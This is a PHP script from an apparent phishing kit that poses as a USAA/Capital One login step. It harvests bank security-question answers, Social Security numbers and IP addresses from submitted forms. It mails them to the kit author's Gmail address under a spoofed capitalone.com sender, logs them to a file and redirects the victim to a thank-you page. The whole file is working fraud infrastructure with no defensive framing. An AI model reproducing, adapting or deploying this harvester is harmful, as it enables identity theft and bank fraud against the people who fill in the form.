<?
$ip = getenv("REMOTE_ADDR");

$message .= "----------= Usaa PIN Info =---------\n";

$message .= "q1 : ".$_POST['formselect1']."\n";
$message .= "a1 : ".$_POST['answer1']."\n";

$message .= "q2 : ".$_POST['formselect2']."\n";
$message .= "a2 : ".$_POST['answer2']."\n";

$message .= "q3 : ".$_POST['formselect3']."\n";
$message .= "q3 : ".$_POST['answer3']."\n";

$message .= "q4 : ".$_POST['formselect4']."\n";
$message .= "a4 : ".$_POST['answer4']."\n";

$message .= "q5 : ".$_POST['formselect5']."\n";
$message .= "a5 : ".$_POST['answer5']."\n";

$message .= "q6 : ".$_POST['formselect6']."\n";

$message .= "a6 : ".$_POST['answer6']."\n";

$message .= "Social Security Number : ".$_POST['answer7']."\n";


$message .= "1P : ".$ip."\n";

$message .= "-------= Kreated BY lizzyrose/billiondollarsman =-------\n";

$send = "billiondollarsman2015@gmail.com";

$subject = "Capital ONE | $ip";

$headers = "From: USAA LoGin<customer-support@capitalone.com>";

$headers .= $_POST['eMailAdd']."\n";

$headers .= "MIME-Version: 1.0\n";

$arr=array($send, $IP);
foreach ($arr as $send)
{
mail($send,$subject,$message,$headers);
mail($to,$subject,$message,$headers);
}
$fp = fopen("logs.txt","a");
fputs($fp,$message);
fclose($fp);
	
		   header("Location: indexthanks.php");

	 
?>